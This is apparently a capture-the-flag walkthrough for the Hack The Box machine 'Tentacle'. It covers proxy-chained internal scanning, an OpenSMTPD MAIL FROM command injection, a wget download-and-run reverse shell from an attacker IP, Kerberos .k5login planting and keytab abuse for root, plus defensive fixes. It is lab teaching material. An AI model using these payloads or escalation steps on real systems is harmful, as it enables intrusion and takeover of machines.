TENTACLE | LINUX | MEDIUM
BHOSA | 15042021
ENUMERATION
Nmap
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
|   256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_  256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_  bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-04-16 04:25:26Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
SSH → port 22
Version → OpenSSH 8.0
No public exploit for this version; without credentials this is a dead end for now.
Domain → port 53
Version → ISC BIND 9.11.20
1. Zone transfer
A zone transfer (AXFR) copies a domain's zone database from the primary name server to a secondary. If an attacker can perform a zone transfer against the primary or a secondary name server for a domain, they get every DNS record for that domain in one query.
Dig
dig axfr @<ip> realcorp.htb
dig axfr @<ip>
Both attempts end with "; Transfer failed." The server does not allow AXFR to us.
2. A and PTR record lookup
Forward and reverse DNS lookups to find further host names and IP addresses.
Dig
dig +noall +answer ANY @<dns_ip> "realcorp.htb"
New subdomain → ns.realcorp.htb
A record lookup for ns.realcorp.htb:
dig +noall +answer @10.129.175.123 "ns.realcorp.htb"
New IP address → 10.197.243.77
Subdomain bruteforcing
Since a subdomain named ns.realcorp.htb exists, there is a good chance other subdomains exist too.
Gobuster
gobuster dns -d "realcorp.htb" -r "10.129.175.123" -w "/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt"
Found:
proxy.realcorp.htb
wpad.realcorp.htb
Resolving the new names
An A record lookup on each of these names returns useful IP addresses. (Note that dig -x is the reverse direction, address to name, and expects an IP argument; for name to address a plain query is what is needed.)
proxy.realcorp.htb
dig +noall +answer @10.129.175.123 "proxy.realcorp.htb"
Same IP address as ns.realcorp.htb (10.197.243.77).
wpad.realcorp.htb
dig +noall +answer @10.129.175.123 "wpad.realcorp.htb"
New IP address → 10.197.243.31
Kerberos → port 88
Version → MIT Kerberos
searchsploit and online searches turn up nothing usable without a valid principal and its password; revisited once credentials are found.
Background reading: Normal Understanding, HackTricks.
HTTP proxy → port 3128
Version → Squid http proxy 4.11
The default Squid error page (served for any request the proxy refuses) leaks a contact address and a host name:
j.nakazawa@realcorp.htb
srv01.realcorp.htb
A standard check for a Squid proxy is whether it will forward requests to the machine's own localhost without authentication.
The browser hangs when the machine's IP is requested through the proxy. To see what is actually happening, chain the request through Burp and then through Squid. Either Burp or proxychains can do this.
Burp
Add Squid as an upstream proxy server (Upstream Proxy Servers under Burp's connection settings). Requests now go through Burp and then via Squid.
Intercepting the request and sending it to Repeater shows the response: an authentication-required error (Squid answers 407 Proxy Authentication Required for this destination).
Saving the HTML and loading it locally renders the error page.
See also: ARGS OF COMMANDS → Burp, Proxychains.
Proxychains
Proxychains is a command-line utility that forces a program's TCP connections through a configured chain of proxies. Add the following line to /etc/proxychains.conf under [ProxyList]:
http 10.129.175.213 3128
Now issue a request and open Wireshark listening on tun0. Following the TCP stream of the request shows the same authentication-required result.
But when the address is http://127.0.0.1 we get a "could not be retrieved" error page instead: for localhost the proxy does not demand authentication, it simply relays the request and reports the result.
This means we can port-scan the machine's localhost through the proxy with nmap.
Exploitation
Nmap on localhost
1. One-hop proxy
Strict chain ... 10.129.175.123:3128 ... 127.0.0.1
proxychains -q nmap -sT -n -Pn --top-ports 100 "127.0.0.1"
-sT: full TCP connect scan instead of the default SYN scan. proxychains works by hooking connect() in libc, and an HTTP proxy only relays complete TCP connections (CONNECT tunnels). Raw SYN packets bypass that hook entirely and never reach the proxy, so a SYN scan would report nothing as open.
-n: never do DNS resolution; the lookups would not go through the proxy.
-Pn: treat all hosts as online. Nmap's host discovery sends ICMP echo and TCP probes to 80 and 443. ICMP cannot be sent through an HTTP proxy and 80/443 are closed here, so nmap would declare the host down and skip it. With -Pn it goes straight to port scanning.
https://superuser.com/questions/175428/how-to-ping-when-behind-a-proxy
The scan shows a proxy (3128) listening on localhost. So there is a second proxy, which we can use to test the reachability of the other IP addresses we discovered.
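To make the -sT point concrete, here is an added example (my code, not from these notes, proxychains or nmap) that does what proxychains does for an http entry: it opens a TCP connection to the first proxy, asks each hop in turn to CONNECT to the next, finishes with the target, and uses that as a crude connect scan. The proxy addresses, target and port list in the main block are placeholders taken from the notes, not verified endpoints; the request builder and reply parser are pure functions and run offline.

```python
"""HTTP CONNECT chaining through nested proxies (added example).

The socket helper only does anything useful against live proxies; the
request builder and status parser are pure and testable offline.
"""
import socket
from typing import List, Tuple

Hop = Tuple[str, int]


def build_connect_request(host: str, port: int) -> bytes:
    """CONNECT request that asks a proxy to open a raw TCP tunnel to host:port."""
    return (f"CONNECT {host}:{port} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n\r\n").encode()


def parse_connect_status(reply: bytes) -> int:
    """HTTP status code from a proxy's reply to CONNECT.

    200 = tunnel open, 407 = authentication required (what the first Squid
    answers for external destinations), 403 = denied by ACL, 0 = not HTTP.
    """
    line, _, _ = reply.partition(b"\r\n")
    parts = line.split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return 0
    try:
        return int(parts[1])
    except ValueError:
        return 0


def read_headers(sock: socket.socket) -> bytes:
    """Read until the blank line that ends the proxy's response headers."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def connect_through_chain(chain: List[Hop], target: Hop, timeout: float = 5.0) -> socket.socket:
    """Open a TCP socket to target via chain[0] -> chain[1] -> ... -> target.

    Each hop is asked to CONNECT to the next hop; the last hop is asked to
    CONNECT to the target. This is proxychains' strict_chain for http
    entries, and the reason nmap needs -sT: only a full connect() can ride
    a CONNECT tunnel, raw SYNs never touch the proxy.
    """
    if not chain:
        raise ValueError("need at least one proxy")
    sock = socket.create_connection(chain[0], timeout=timeout)
    for nxt in list(chain[1:]) + [target]:
        sock.sendall(build_connect_request(*nxt))
        status = parse_connect_status(read_headers(sock))
        if status != 200:
            sock.close()
            raise ConnectionError(f"hop refused CONNECT to {nxt[0]}:{nxt[1]} (HTTP {status})")
    return sock


def connect_scan(chain: List[Hop], host: str, ports: List[int]) -> List[int]:
    """Minimal connect scan through the chain: a port counts as open when the
    last proxy reports 200 for CONNECT host:port, closed/filtered otherwise."""
    open_ports = []
    for port in ports:
        try:
            connect_through_chain(chain, (host, port)).close()
            open_ports.append(port)
        except (ConnectionError, OSError):
            pass
    return open_ports


if __name__ == "__main__":
    # Three-hop chain from the notes (placeholders); run only against a live target.
    chain = [("10.129.175.217", 3128), ("127.0.0.1", 3128), ("10.197.243.77", 3128)]
    print(connect_scan(chain, "10.241.251.113", [22, 25, 80, 3128]))
```

A 407 from the first hop is exactly the "proxy authentication error" seen when asking it for external addresses, while a CONNECT to 127.0.0.1 is relayed without credentials.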
Requesting proxy.realcorp.htb or wpad.realcorp.htb through it gives a proxy authentication error, just like the first attempt against 10.129.175.123.
With this second proxy known, proxychains can be told to go through 10.129.175.123:3128 and then 127.0.0.1:3128.
2. Two-hop proxy
Strict chain ... 10.129.175.123:3128 → 127.0.0.1:3128 ... 10.197.243.77
Nmap
proxychains -q nmap -sT -n -Pn --top-ports 100 10.197.243.77
This machine also has a proxy listener on 3128, which fits its name proxy.realcorp.htb.
Strict chain ... 10.129.175.123:3128 → 127.0.0.1:3128 ... 10.197.243.31
proxychains -q nmap -sT -n -Pn --top-ports 10 10.197.243.31
wpad.realcorp.htb is not reachable over this path, or the proxy ACLs deny it.
3. Three-hop proxy
Strict chain ... 10.129.175.123:3128 → 127.0.0.1:3128 → 10.197.243.77:3128 ... 10.197.243.31
Since wpad is still unreachable and there is another proxy available, the next guess is to use proxy.realcorp.htb as a third hop to reach wpad.realcorp.htb.
/etc/proxychains.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks5 127.0.0.1 1080
#socks4 127.0.0.1 9050
http 10.129.175.217 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
(The target's address differs between sessions in these notes: 10.129.175.123, .213 and .217 all refer to the same box; use the current one. strict_chain, the default, must be in effect so the hops are used in this order.)
curl
proxychains curl http://10.197.243.31 | tee redhat.html; firefox redhat.html
This returns a Red Hat default page.
The next step was a guess: request the host by name instead, since a virtual host may serve a different page. curl takes the Host header from the URL; for the name itself to be usable, either let the proxy resolve it (proxy_dns in /etc/proxychains.conf) or add wpad.realcorp.htb to /etc/hosts pointing at 10.197.243.31.
proxychains curl http://wpad.realcorp.htb | tee redhat2.html; firefox redhat2.html
This returns a Forbidden page, so there is a separate virtual host for wpad.realcorp.htb.
Web Proxy Auto-Discovery (WPAD) is the protocol clients use to locate the URL of a proxy configuration (PAC) file via DHCP and/or DNS. The conventional location is http://wpad.<domain>/wpad.dat.
The next guess was therefore wpad.dat, the PAC file containing the proxy routing rules.
proxychains curl http://wpad.realcorp.htb/wpad.dat | tee redhat3.html; firefox redhat3.html
The PAC file reveals a new internal range: 10.241.251.0.
Brute-force the IP range to find addresses that have DNS records
We need to find which hosts in 10.241.251.0/24 have a PTR record (reverse DNS lookup). See SPECIFIC METHODOLOGY → DNS pentesting methodology.
for i in {1..150}; do dig +noall +answer @10.129.175.217 -x 10.241.251.${i}; done
The sweep returns a PTR record for .113:
113.251.241.10.in-addr.arpa. 259200 IN PTR srvpod01.realcorp.htb.
We have a new subdomain. A record lookup:
dig +noall +answer @10.129.175.217 "srvpod01.realcorp.htb"
New IP address: 10.241.251.113
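An added example (my code, not from the notes; the PAC text inside it is constructed, the real wpad.dat is not reproduced here, only the 10.241.251.0 range comes from the notes) of pulling the useful parts out of a PAC file and turning a discovered range into the in-addr.arpa names that the reverse sweep above queries one by one:

```python
"""Extract internal ranges, proxy hosts and domains from a WPAD PAC file
and derive PTR query names for a reverse-DNS sweep (added example)."""
import ipaddress
import re
from typing import Dict, List, Set

# Constructed sample mimicking a typical wpad.dat; not the target's file.
SAMPLE_PAC = """
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb")) return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0")) return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0")) return "DIRECT";
    return "PROXY proxy.realcorp.htb:3128";
}
"""

# isInNet(<expr>, "<addr>", "<mask>") leaks the networks the admins consider internal
_ISINNET = re.compile(r'isInNet\([^,]+,\s*"([\d.]+)"\s*,\s*"([\d.]+)"\s*\)')
# "PROXY host:port" entries name the proxies clients are pointed at
_PROXY = re.compile(r'"PROXY\s+([^"\s;]+)')
# dnsDomainIs(<expr>, "<domain>") leaks internal DNS suffixes
_DOMAIN = re.compile(r'dnsDomainIs\([^,]+,\s*"([^"]+)"\)')


def pac_networks(pac: str) -> List[ipaddress.IPv4Network]:
    """Networks referenced by isInNet(), deduplicated and sorted."""
    nets = set()
    for addr, mask in _ISINNET.findall(pac):
        nets.add(ipaddress.IPv4Network(f"{addr}/{mask}", strict=False))
    return sorted(nets, key=lambda n: int(n.network_address))


def pac_proxies(pac: str) -> Set[str]:
    return set(_PROXY.findall(pac))


def pac_domains(pac: str) -> Set[str]:
    return set(_DOMAIN.findall(pac))


def ptr_names(net: ipaddress.IPv4Network) -> List[str]:
    """in-addr.arpa names for every host in net, the same names dig -x queries."""
    return [host.reverse_pointer for host in net.hosts()]


def summarize(pac: str) -> Dict[str, object]:
    return {
        "networks": [str(n) for n in pac_networks(pac)],
        "proxies": sorted(pac_proxies(pac)),
        "domains": sorted(pac_domains(pac)),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_PAC))
    # feed these to dig -x (through the proxy chain) or to a resolver library
    for name in ptr_names(pac_networks(SAMPLE_PAC)[1])[:3]:
        print(name)
```

The regexes deliberately match only the literal-string forms of isInNet/dnsDomainIs; a PAC that builds its arguments dynamically needs a JavaScript engine, not a regex.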
Another nmap through proxychains against this host shows a mail service.
Strict chain ... 10.129.175.123:3128 → 127.0.0.1:3128 → 10.197.243.77:3128 ... 10.241.251.113
proxychains -q nmap -sT -n -Pn --top-ports 10 "10.241.251.113"
A version scan on port 25 (-sV -p 25) identifies OpenSMTPD on OpenBSD, a version with a public remote code execution exploit.
SMTP exploit
Searchsploit finds the exploit script; its core is:
    print('[*] Connected, sending payload')
    # the command is smuggled inside the reverse-path of MAIL FROM
    s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
    res = s.recv(1024)
The bug is unsanitised handling of the sender address: the server uses the MAIL FROM local part when building a command line for delivery, so a ";" inside the angle brackets terminates the intended command and starts ours, and the trailing ";" closes our command cleanly so the rest of the line is ignored.
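An added example, written for these notes rather than taken from the exploit script or from OpenSMTPD, that models the bug class: a sender address lifted from MAIL FROM and spliced into a delivery command line, beside a version that validates the mailbox syntax and shell-quotes it. The deliver path and function names are invented; nothing is executed, both functions only return the command string that would reach the shell.

```python
"""Why MAIL FROM:<;cmd;> works, and the check that stops it (added example)."""
import re
import shlex
from typing import List, Optional

# Constructed inputs: a legitimate sender and the injected one from the notes.
LEGIT = "MAIL FROM:<j.nakazawa@realcorp.htb>"
INJECTED = "MAIL FROM:<;id;>"

# RFC 5321 dot-atom local part and a dotted domain. No ';', quotes, spaces
# or other shell metacharacters can get through this.
_LOCAL = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
_DOMAIN = r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
MAILBOX_RE = re.compile(rf"^(?P<local>{_LOCAL})@(?P<domain>{_DOMAIN})$")


def extract_path(line: str) -> Optional[str]:
    """Reverse-path between the angle brackets of a MAIL FROM line."""
    m = re.match(r"MAIL FROM:\s*<(.*)>", line, re.IGNORECASE)
    return m.group(1) if m else None


def vulnerable_delivery_cmd(line: str) -> str:
    """The bug class: raw sender interpolated into a command later run via sh -c.
    (Hypothetical deliver binary; mirrors the shape of the flaw, not real code.)"""
    sender = extract_path(line)
    return f"/usr/local/bin/deliver --from {sender}"


def is_valid_mailbox(addr: Optional[str]) -> bool:
    return addr is not None and MAILBOX_RE.match(addr) is not None


def hardened_delivery_cmd(line: str) -> str:
    """Validate the mailbox first, then quote it so the shell sees one word."""
    sender = extract_path(line)
    if not is_valid_mailbox(sender):
        raise ValueError("553 5.1.7 sender address syntax error")
    return f"/usr/local/bin/deliver --from {shlex.quote(sender)}"


def shell_segments(cmd: str) -> List[str]:
    """Split on ';' the way sh would, to show where the injected command lands."""
    return [seg for seg in re.split(r"\s*;\s*", cmd) if seg]
```

The second segment returned by shell_segments for the injected line is the attacker's command, which is exactly what the exploit script relies on; the hardened path rejects it before any command line exists.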
Strategy
First send a wget command that downloads the reverse shell from our server.
Then send a second command that executes the script.
Make sure a listener is waiting for the incoming connection (and a web server is serving shell.sh).
It is always advisable to confirm the RCE with something harmless first (a ping or a wget back to your own box, watched with tcpdump) rather than going straight for a reverse shell.
proxychains python3 smtp_rce.py "10.241.251.113" 25 'wget 10.10.14.27/shell.sh -O /tmp/tmux.sh'
We see the machine fetch the payload from our web server. Now execute it:
proxychains python3 smtp_rce.py "10.241.251.113" 25 'bash /tmp/tmux.sh'
We are root on smtp.realcorp.htb.
Privesc
Root on smtp.realcorp.htb → j.nakazawa on realcorp.htb
Enumerating the box, there is an interesting file in the home folder of j.nakazawa:
.msmtprc
---snip---
# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_          <---------- possible password
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
---snip---
We have a password. Possible reuse for SSH? No SSH login accepts it.
But since Kerberos is running on the box, the password may be usable to obtain a ticket.
Kerberos enum and walkthrough
Kerberos is an authentication protocol that lets a client and a service authenticate each other across an untrusted network.
Passwords are never sent over the network where they could be sniffed; the protocol works with symmetric keys derived from them.
A trusted third party, the KDC, made up of the Authentication Server (AS) and the Ticket Granting Server (TGS), authenticates the client and issues tickets for services.
So the client and the service can communicate without exchanging passwords or public keys between themselves.
Detailed explanation of Kerberos auth: CONCEPTS ONLY → Kerberos
Every user needs a ticket granted by the TGS to access a service, so we need a Kerberos client package to make the requests.
First edit /etc/krb5.conf so the tools can find the KDC (AS) for the realm. Only the realm entry is needed; realcorp.htb must resolve to the box (an /etc/hosts entry will do):
[realms]
    REALCORP.HTB = {
        kdc = realcorp.htb:88
    }
The Kerberos client reads this file to look up realms.
Requesting a ticket
kinit j.nakazawa@REALCORP.HTB
This asks the realm REALCORP.HTB for a ticket-granting ticket. If a principal called j.nakazawa exists, it prompts for either the password or a keytab file, depending on how the principal is configured.
Here we are asked for a password. We enter the one from the .msmtprc file and receive a TGT (klist shows it). With GSSAPI authentication enabled on the SSH client, that ticket then logs us in as j.nakazawa on realcorp.htb without a password prompt.
We are user j.nakazawa
j.nakazawa → admin
There is another user named admin.
Running linpeas or normal manual enumeration shows a cron job run by the admin user.
[j.nakazawa@srv01 squid]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
[j.nakazawa@srv01 squid]$
Every minute the admin user runs a shell script that rsyncs /var/log/squid/ into /home/admin/.
Note: the script uses rsync rather than a plain cp with a wildcard, so the wildcard (filename-as-option) injection used on DYNSTR is not the route here.
Kerberos alternative to authorized_keys
Kerberos has a feature for SSH users that works much like the authorized_keys file.
A file called .k5login in an account's home directory lists the Kerberos principals allowed to log in as that account (here the SSH user admin). The check is done by the Kerberos library (sshd with GSSAPI, ksu), so no ticket is needed beyond the one the listed principal already holds.
Once a principal such as j.nakazawa@REALCORP.HTB is listed there, j.nakazawa can SSH in as admin with the ticket we already generated.
Strategy
Create a file named .k5login in /var/log/squid containing j.nakazawa@REALCORP.HTB.
The cron job runs and rsyncs the .k5login file into admin's home directory.
Now SSH in as admin from the attacker machine: sshd looks up j.nakazawa in the .k5login file we planted, and we are in as admin.
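An added example (my code; log_backup.sh itself is not reproduced in the notes) contrasting a backup job that mirrors an attacker-writable directory into a home directory with one that copies only regular *.log files into a dedicated subdirectory. The paths in the demo are temporary stand-ins for /var/log/squid and /home/admin; the planted .k5login content is the one used above.

```python
"""Why mirroring /var/log/squid/ into /home/admin/ is a privilege escalation,
and a backup job that cannot be abused the same way (added example)."""
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List


def unsafe_backup(src: Path, dst: Path) -> List[str]:
    """Mirror every entry of src into dst, dotfiles included, which is what an
    'rsync -a src/ dst/' style job does. Returns the names copied."""
    copied = []
    for entry in src.iterdir():
        target = dst / entry.name
        if entry.is_dir():
            shutil.copytree(entry, target, dirs_exist_ok=True)
        else:
            shutil.copy2(entry, target)
        copied.append(entry.name)
    return sorted(copied)


def safe_backup(src: Path, dst_home: Path) -> List[str]:
    """Copy only regular, non-hidden *.log files, and only into a dedicated
    subdirectory, so nothing in src can ever become ~/.k5login,
    ~/.ssh/authorized_keys or ~/.bashrc of the account running the job."""
    dest = dst_home / "log_backup"
    dest.mkdir(mode=0o700, exist_ok=True)
    copied = []
    for entry in src.iterdir():
        if entry.name.startswith(".") or entry.suffix != ".log":
            continue
        if entry.is_symlink() or not entry.is_file():
            continue  # no symlink tricks, no nested directories
        shutil.copy2(entry, dest / entry.name)
        copied.append(entry.name)
    return sorted(copied)


def demo() -> Dict[str, object]:
    """Stage the attack in a temp dir and report what each job exposed."""
    with tempfile.TemporaryDirectory() as tmp:
        log = Path(tmp) / "var_log_squid"        # stand-in for /var/log/squid
        home_unsafe = Path(tmp) / "home_admin_unsafe"
        home_safe = Path(tmp) / "home_admin_safe"
        for d in (log, home_unsafe, home_safe):
            d.mkdir()
        # constructed contents: two real-looking logs plus the planted file
        (log / "access.log").write_text("constructed squid access log line\n")
        (log / "cache.log").write_text("constructed squid cache log line\n")
        (log / ".k5login").write_text("j.nakazawa@REALCORP.HTB\n")
        unsafe_backup(log, home_unsafe)
        safe_backup(log, home_safe)
        return {
            "unsafe_k5login": (home_unsafe / ".k5login").exists(),
            "safe_k5login": (home_safe / ".k5login").exists(),
            "safe_copied": sorted(p.name for p in (home_safe / "log_backup").iterdir()),
        }


if __name__ == "__main__":
    print(demo())
```

The allow-list on name and type matters more than the destination: even inside a subdirectory, a symlink or a file named like a shell rc file copied by a privileged job is a foothold.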
We are user admin
admin → ROOT
Enumerating files readable by admin reveals a keytab file.
A keytab holds the long-term keys of one or more Kerberos principals so that a service can authenticate without typing a password.
Anyone who can read a keytab can authenticate as the principals in it (klist -kt <keytab> lists them).
This keytab contains an administrative principal, so it gets us into the kadmin prompt: kadmin -kt <keytab> -p <principal>.
From that prompt we create a principal for root. When we then switch user with ksu, Kerberos asks for the password of the root principal, which we have just set.
kadmin: addprinc root
We are root
CREDENTIALS
Password: sJB}RM>6Z~64_ (j.nakazawa, from .msmtprc; also the Kerberos password)
DEFENSE
Squid was misconfigured: an unauthenticated client could reach localhost and the internal network through it, which is what let us enumerate the internal hosts.
Keep the stock Squid ACLs (the shipped squid.conf denies to_localhost and only allows the configured localnet), require authentication for every destination, and do not expose the proxy to untrusted networks.
Username and password were exposed in .msmtprc, which led to the Kerberos SSH login.
Do not keep plaintext credentials in dotfiles (msmtp supports passwordeval for fetching the secret from a keyring), and never reuse a mail password for a Kerberos principal.
The admin user's crontab and the script it runs were readable by everyone, and the script copied the contents of a directory writable by other users into admin's home directory. This allowed .k5login spoofing.
Restrict the script and /var/log/squid so only admin can read and write them, and make the backup job copy only the expected log files into a dedicated directory rather than mirroring arbitrary files (dotfiles included) into a home directory.
admin to root was possible because of a readable keytab file.
The documentation is clear that keytabs need protective permissions (root-owned, mode 600), yet admin was in a group with read access to a keytab holding a principal with admin and changepw rights (the kadmin principal, as granted in kadm5.acl), which made it possible to create a root principal.
FLAGS
User: 9fe92ac9dba259b31b9aab6aa349cad8
Root: 0162c27af602daf43669f6d033ee39ec
THINGS LEARNT
Squid proxy: TENTACLE → http-proxy - 3128
Kerberos: CONCEPTS ONLY → Kerberos
Containerized Kerberos: https://www.confluent.io/blog/containerized-testing-with-kerberos-and-ssh/